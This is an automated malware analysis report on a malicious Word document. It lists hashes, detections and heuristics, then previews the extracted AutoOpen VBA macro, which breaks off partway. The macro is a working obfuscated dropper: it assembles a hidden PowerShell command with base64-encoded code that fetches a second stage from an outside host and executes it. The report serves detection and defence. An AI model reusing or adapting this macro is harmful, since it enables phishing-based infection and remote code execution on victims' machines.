Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5162b871a5689b77…

MALICIOUS

Office (OLE)

282.5 KB Created: 2018-02-26 17:33:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: 05f6112da66dd8e727d508996d68fcd4 SHA-1: 50f4ad3c58c3a9e7cfd5d9cdff4a9428faeb40b8 SHA-256: 5162b871a5689b77b28f9e6b9e6c47a34e79a52e4a6948edb75eb1ff5f594344
202 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The file contains a legacy WordBasic AutoOpen macro that attempts to execute obfuscated PowerShell code. The script concatenates several strings to form a PowerShell command, likely to download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-6458367-0' further supports its malicious nature as a dropper.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6458367-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6458367-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6046 bytes
SHA-256: 7084a7102b3017f4dfd7522151f9321659834d3cdc31a6950cc05e87ab47e8b3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "wrap"
Sub AutoOpen()
    Dim JR_PA As String
    JP_SE = Array("c", "s", "x", "p", "d", " ", "t", "n", "y", "u", "w", "i", "r", "a", "h", "b", "o", "l", "e", "-")
    Dim FM_TI As String
    FM_TI = "ZgB1AG4AYwB0AGkAbwBuACAAYQAoACQAeAAp"
    JR_PA = JR_PA + JP_SE(3)
    JR_PA = JR_PA + JP_SE(16)
    Dim AO_NF As String
    AO_NF = "AHsAcgBlAHQAdQByAG4AIABbAFMAeQ"
    JR_PA = JR_PA + JP_SE(10)
    JR_PA = JR_PA + JP_SE(18)
    Dim BN_RG As String
    BN_RG = "BzAHQAZQB"
    JR_PA = JR_PA + JP_SE(12)
    JR_PA = JR_PA + JP_SE(1)
    Dim DT_ND As String
    DT_ND = "tAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdA"
    JR_PA = JR_PA + JP_SE(14)
    JR_PA = JR_PA + JP_SE(18)
    Dim FM_ME As String
    FM_ME = "DoAOgBVAFQARgA4AC4ARwBlAHQA"
    AN_SG = AN_SG & FM_TI & AO_NF & BN_RG & DT_ND & FM_ME
    JR_PA = JR_PA + JP_SE(17)
    JR_PA = JR_PA + JP_SE(17)
    Dim AK_LJ As String
    AK_LJ = "UwB0AHIAaQBuAGcAK"
    JR_PA = JR_PA + JP_SE(5)
    JR_PA = JR_PA + JP_SE(19)
    Dim HQ_PA As String
    HQ_PA = "ABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgB"
    JR_PA = JR_PA + JP_SE(10)
    JR_PA = JR_PA + JP_SE(11)
    Dim FM_NI As String
    FM_NI = "lAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUAN"
    JR_PA = JR_PA + JP_SE(7)
    JR_PA = JR_PA + JP_SE(4)
    Dim AR_OB As String
    AR_OB = "gA0AFMAdAByAGkAbgBnACgAJ"
    JR_PA = JR_PA + JP_SE(16)
    JR_PA = JR_PA + JP_SE(10)
    Dim EP_MD As String
    EP_MD = "AB4ACkAKQ"
    AN_SG = AN_SG & AK_LJ & HQ_PA & FM_NI & AR_OB & EP_MD
    JR_PA = JR_PA + JP_SE(1)
    JR_PA = JR_PA + JP_SE(6)
    Dim IK_RI As String
    IK_RI = "B9ADsAaQBlAHgAIAAkACgAYQAgACQAKAAkAC"
    JR_PA = JR_PA + JP_SE(8)
    JR_PA = JR_PA + JP_SE(17)
    Dim HS_OA As String
    HS_OA = "gAJAAoAGkAbgB2AG8AawBlAC0AdwBlAG"
    JR_PA = JR_PA + JP_SE(18)
    JR_PA = JR_PA + JP_SE(5)
    Dim IL_TI As String
    IL_TI = "IAcgBlAHEAdQBlAHMAdAAgACcAaA"
    JR_PA = JR_PA + JP_SE(14)
    JR_PA = JR_PA + JP_SE(11)
    Dim FM_QG As String
    FM_QG = "B0AHQAcAB"
    JR_PA = JR_PA + JP_SE(4)
    JR_PA = JR_PA + JP_SE(4)
    Dim ER_QA As String
    ER_QA = "zADoALwAvAHUAcwBwAHIAZAA1ADEANQAwAGMAZQBuA"
    AN_SG = AN_SG & IK_RI & HS_OA & IL_TI & FM_QG & ER_QA
    JR_PA = JR_PA + JP_SE(18)
    JR_PA = JR_PA + JP_SE(7)
    Dim DQ_NH As String
    DQ_NH = "HQAcgBhAGwALgB0AGEAYgBsAGUALgBjAG8AcgBlAC4Adw"
    JR_PA = JR_PA + JP_SE(5)
    JR_PA = JR_PA + JP_SE(19)
    Dim JL_OH As String
    JL_OH = "BpAG4AZABvAHcAcwAuAG4AZQB0AC8AdwBhAHIAZQBoAG8Ad"
    JR_PA = JR_PA + JP_SE(18)
    JR_PA = JR_PA + JP_SE(2)
    Dim GT_PF As String
    GT_PF = "QBzAGUAP"
    JR_PA = JR_PA + JP_SE(18)
    JR_PA = JR_PA + JP_SE(0)
    Dim AP_KB As String
    AP_KB = "wAkAGYAaQBsAHQAZQByAD0AUABhAHIAdABpAHQAaQBvAG"
    JR_PA = JR_PA + JP_SE(9)
    JR_PA = JR_PA + JP_SE(6)
    Dim JS_SF As String
    JS_SF = "4ASwBlAHkAJQ"
    AN_SG = AN_SG & DQ_NH & JL_OH & GT_PF & AP_KB & JS_SF
    JR_PA = JR_PA + JP_SE(11)
    JR_PA = JR_PA + JP_SE(16)
    Dim BN_QD As String
    BN_QD = "AyADAAZQBxACUAMgAwACUAMgA3AHMAdAB"
    JR_PA = JR_PA + JP_SE(7)
    JR_PA = JR_PA + JP_SE(3)
    Dim FL_KF As String
    FL_KF = "hAGcAZQAlADIANwAmACQAUwBlAGwAZQBjAHQAPQBkA"
    JR_PA = JR_PA + JP_SE(16)
    JR_PA = JR_PA + JP_SE(17)
    Dim DT_OB As String
    DT_OB = "GEAdABhACYAcwB2AD0"
    JR_PA = JR_PA + JP_SE(11)
    JR_PA = JR_PA + JP_SE(0)
    Dim AN_KB As String
    AN_KB = "AMgAwADEANwAtADAANAAtADEANwAmAHMAcw"
    JR_PA = JR_PA + JP_SE(8)
    JR_PA = JR_PA + JP_SE(5)
    Dim EL_TB As String
    EL_TB = "A9AGIAZgBxAHQAJgBzAHIAdAA9AHMAYwBvACYAcwBwAD0A"
    AN_SG = AN_SG & BN_QD & FL_KF & DT_OB & AN_KB & EL_TB
    JR_PA = JR_PA + JP_SE(15)
    JR_PA = JR_PA + JP_SE(8)
    Dim JQ_LB As String
    JQ
... (truncated)